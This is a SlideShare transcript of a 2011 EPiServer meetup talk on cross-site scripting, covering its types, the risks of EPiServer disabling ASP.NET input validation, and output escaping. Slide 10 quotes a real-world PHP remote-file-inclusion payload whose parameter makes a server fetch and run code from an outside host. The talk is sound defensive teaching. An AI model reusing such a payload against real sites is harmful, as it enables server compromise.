• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011

XSS - Presented at EPiServer Meetup in Oslo 25th May 2011






Total Views
Views on SlideShare
Embed Views



0 Embeds 0

No embeds



Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

    XSS - Presented at EPiServer Meetup in Oslo 25th May 2011 XSS - Presented at EPiServer Meetup in Oslo 25th May 2011 Presentation Transcript

    • XSS – Cross site scripting
      Oslo EPiServer Meetup #7 – 25th May 2011
      © Creuna
      Slide 1
    • Definition
      Cross site scripting is a form ofattackwheretheattacker is able to run arbitraryjavascriptcode in a web pageviewed by anotheruser
      XSS compromisestheclient side, not the server
      Butdependingonthe nature ofthewebsite it can be a serioussecurity risk
      © Creuna
      Slide 2
    • Consequences
      XSS may be used to
      - Stealsessioncookies
      - Performany action thattheattackeduser has rights to do, maybeevenwithouthimknowing
      - Display false or modifiedcontent
      - XSS attacksmayspread like a software worm, for instance in a socialnetworksite. A user posts theattackingcodewhichinfects his friends, they post and so on.
      © Creuna
      Slide 3
    • Two types of XSS
      Non persistent:
      A userfollows a malicious link or form from a dangerouswebsite, email, etc. The vulnerable websitewritesthe XSS attack to theresponse, and onlythisuser is affected
      The XSS attackcode is storedonthe vulnerable web site, for instance in a usercomment. All subsequentusersofthe web sitemay be exposed to the XSS attack
      © Creuna
      Slide 4
    • Wheredoesthexssattackcome from?
      All content from insecuresources is potentiallydangerous
      - Form submissions
      - Urls
      - All othersources, RSS feeds, integrated systems, etc.
      © Creuna
      Slide 5
    • Form submissions
      DangerouscontentmaycomethroughPOST variables
      Rememberthat POST requests do not necessarilyoriginate from a form on a pageyouservedtheuser, an attackermaycraft a webpage or requesttargetingyour web site
      (Demo showed a simple ASP.NET form writing a submittedtext back to thepageon postback. By defaultdangerous POST variables result in an exception in ASP.NET, so wearecovered, right? Next demo showed same principle in a minimallymodified EPiServer demo site, and the XSS attackwassuccessful. EPiServer turns off ASP.NETs input verification in itsdefaultconfiguration.)
      © Creuna
      Slide 6
    • Url input
      Do youwritethevalueofRequest.Url back to yourresponse?
      Yes, even ASP.NET itselfdoesthat
      (Demo showedusing a url with XSS in it in a standard ASP.NET web site, and wegot an exception like withthe POST attack. EPiServer proved vulnerable again.)
      © Creuna
      Slide 7
    • EPiServer
      ASP.NET is normallywellsecuredagainst XSS
      But EPiServer turnsthis feature off by default
      We must alwaysgiveexternal input an extrathought in EPiServer, ASP.NETs normal safetynet is turned off!
      © Creuna
      Slide 8
    • How do wesecureourselvesagains XSS?
      Always make sure to escape data from unsecuresourcesifyouaregoing to write it to theresponse
      This alsoapplies to urls, like Request.Url
      Do not trust yourownability to foresee all scenarios so do not writethecode for thisyourself
      Use a welltested and reviewedframework
      For instance Microsofts AntiXSS: http://wpl.codeplex.com/
      © Creuna
      Slide 9
    • Are youusing PHP?
      As PHP is a script language, similarattacksmayactuallycompromisethe server side
      Real world example from oneofourprojects:
      <form method="post" action="/no/?_SERVER%25255bDOCUMENT_ROOT%25255d=http://bungalowsdemo.info/images/test.gif”id="aspnetForm">
      This attackwould make the server run the PHP code in test.gif, which is not a picturebutPHP code
      The websitebungalowsdemo.info is probablyunknowinglyattacked and used to host theattackcode
      © Creuna
      Slide 10
    • External script files
      Do youincludeexternal script files in your web site?
      For instance, do youuseGoogles/Microsofts CDN for javascript?
      Real world example, web statisticstool:
      <script src=http://res.xtractor.no/x.jstype="text/javascript"></script>
      © Creuna
      Slide 11
    • External script files
      Ifyoureferenceexternal script files yougiveanotherdomain/sourcethe right to run javascriptonyour web site
      Of courseyoucan trust Googles or Microsofts CDN to deliver proper code
      But a differentdomainmay be vulnerable to DNS attacks
      An attackermaymanipulate DNS onthelocalmachine or network to deliverexternal scripts from a differentsource
      If all referenced script files are from the same domain as theviewed web pageyouavoidthisvulnerability
      © Creuna
      Slide 12
    • Questions?
      © Creuna
      Slide 13